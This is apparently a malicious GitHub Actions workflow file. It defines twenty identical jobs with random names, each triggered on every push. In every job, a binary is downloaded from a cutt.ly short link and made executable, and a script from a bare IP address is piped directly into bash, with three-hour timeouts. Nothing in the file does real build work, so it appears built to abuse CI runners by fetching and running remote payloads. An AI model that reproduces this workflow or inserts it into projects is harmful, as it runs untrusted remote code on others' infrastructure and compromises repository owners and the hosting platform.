name: nejati
on: push
jobs:
  buzubi:
    runs-on: ubuntu-latest
    timeout-minutes: 180
    steps:
    - name: First
      run: wget https://cutt.ly/URirSKE; chmod +x URirSKE
    - name: Update
      run: curl http://103.174.115.128/mandalorian/npysxlw.php?a=lejo | bash -
  rexenivi:
    runs-on: ubuntu-latest
    timeout-minutes: 180
    steps:
    - name: First
      run: wget https://cutt.ly/URirSKE; chmod +x URirSKE
    - name: Update
      run: curl http://103.174.115.128/mandalorian/npysxlw.php?a=lejo | bash -
  hicuci:
    runs-on: ubuntu-latest
    timeout-minutes: 180
    steps:
    - name: First
      run: wget https://cutt.ly/URirSKE; chmod +x URirSKE
    - name: Update
      run: curl http://103.174.115.128/mandalorian/npysxlw.php?a=lejo | bash -
  felofo:
    runs-on: ubuntu-latest
    timeout-minutes: 180
    steps:
    - name: First
      run: wget https://cutt.ly/URirSKE; chmod +x URirSKE
    - name: Update
      run: curl http://103.174.115.128/mandalorian/npysxlw.php?a=lejo | bash -
  nadihu:
    runs-on: ubuntu-latest
    timeout-minutes: 180
    steps:
    - name: First
      run: wget https://cutt.ly/URirSKE; chmod +x URirSKE
    - name: Update
      run: curl http://103.174.115.128/mandalorian/npysxlw.php?a=lejo | bash -
  negapuhe:
    runs-on: ubuntu-latest
    timeout-minutes: 180
    steps:
    - name: First
      run: wget https://cutt.ly/URirSKE; chmod +x URirSKE
    - name: Update
      run: curl http://103.174.115.128/mandalorian/npysxlw.php?a=lejo | bash -
  yihugepi:
    runs-on: ubuntu-latest
    timeout-minutes: 180
    steps:
    - name: First
      run: wget https://cutt.ly/URirSKE; chmod +x URirSKE
    - name: Update
      run: curl http://103.174.115.128/mandalorian/npysxlw.php?a=lejo | bash -
  ruwivu:
    runs-on: ubuntu-latest
    timeout-minutes: 180
    steps:
    - name: First
      run: wget https://cutt.ly/URirSKE; chmod +x URirSKE
    - name: Update
      run: curl http://103.174.115.128/mandalorian/npysxlw.php?a=lejo | bash -
  sejezu:
    runs-on: ubuntu-latest
    timeout-minutes: 180
    steps:
    - name: First
      run: wget https://cutt.ly/URirSKE; chmod +x URirSKE
    - name: Update
      run: curl http://103.174.115.128/mandalorian/npysxlw.php?a=lejo | bash -
  wemukoge:
    runs-on: ubuntu-latest
    timeout-minutes: 180
    steps:
    - name: First
      run: wget https://cutt.ly/URirSKE; chmod +x URirSKE
    - name: Update
      run: curl http://103.174.115.128/mandalorian/npysxlw.php?a=lejo | bash -
  gogevajo:
    runs-on: ubuntu-latest
    timeout-minutes: 180
    steps:
    - name: First
      run: wget https://cutt.ly/URirSKE; chmod +x URirSKE
    - name: Update
      run: curl http://103.174.115.128/mandalorian/npysxlw.php?a=lejo | bash -
  mehujo:
    runs-on: ubuntu-latest
    timeout-minutes: 180
    steps:
    - name: First
      run: wget https://cutt.ly/URirSKE; chmod +x URirSKE
    - name: Update
      run: curl http://103.174.115.128/mandalorian/npysxlw.php?a=lejo | bash -
  fewiro:
    runs-on: ubuntu-latest
    timeout-minutes: 180
    steps:
    - name: First
      run: wget https://cutt.ly/URirSKE; chmod +x URirSKE
    - name: Update
      run: curl http://103.174.115.128/mandalorian/npysxlw.php?a=lejo | bash -
  yazoni:
    runs-on: ubuntu-latest
    timeout-minutes: 180
    steps:
    - name: First
      run: wget https://cutt.ly/URirSKE; chmod +x URirSKE
    - name: Update
      run: curl http://103.174.115.128/mandalorian/npysxlw.php?a=lejo | bash -
  derocasa:
    runs-on: ubuntu-latest
    timeout-minutes: 180
    steps:
    - name: First
      run: wget https://cutt.ly/URirSKE; chmod +x URirSKE
    - name: Update
      run: curl http://103.174.115.128/mandalorian/npysxlw.php?a=lejo | bash -
  daxudo:
    runs-on: ubuntu-latest
    timeout-minutes: 180
    steps:
    - name: First
      run: wget https://cutt.ly/URirSKE; chmod +x URirSKE
    - name: Update
      run: curl http://103.174.115.128/mandalorian/npysxlw.php?a=lejo | bash -
  furari:
    runs-on: ubuntu-latest
    timeout-minutes: 180
    steps:
    - name: First
      run: wget https://cutt.ly/URirSKE; chmod +x URirSKE
    - name: Update
      run: curl http://103.174.115.128/mandalorian/npysxlw.php?a=lejo | bash -
  hinicoju:
    runs-on: ubuntu-latest
    timeout-minutes: 180
    steps:
    - name: First
      run: wget https://cutt.ly/URirSKE; chmod +x URirSKE
    - name: Update
      run: curl http://103.174.115.128/mandalorian/npysxlw.php?a=lejo | bash -
  bojiliyu:
    runs-on: ubuntu-latest
    timeout-minutes: 180
    steps:
    - name: First
      run: wget https://cutt.ly/URirSKE; chmod +x URirSKE
    - name: Update
      run: curl http://103.174.115.128/mandalorian/npysxlw.php?a=lejo | bash -
  kokanale:
    runs-on: ubuntu-latest
    timeout-minutes: 180
    steps:
    - name: First
      run: wget https://cutt.ly/URirSKE; chmod +x URirSKE
    - name: Update
      run: curl http://103.174.115.128/mandalorian/npysxlw.php?a=lejo | bash -
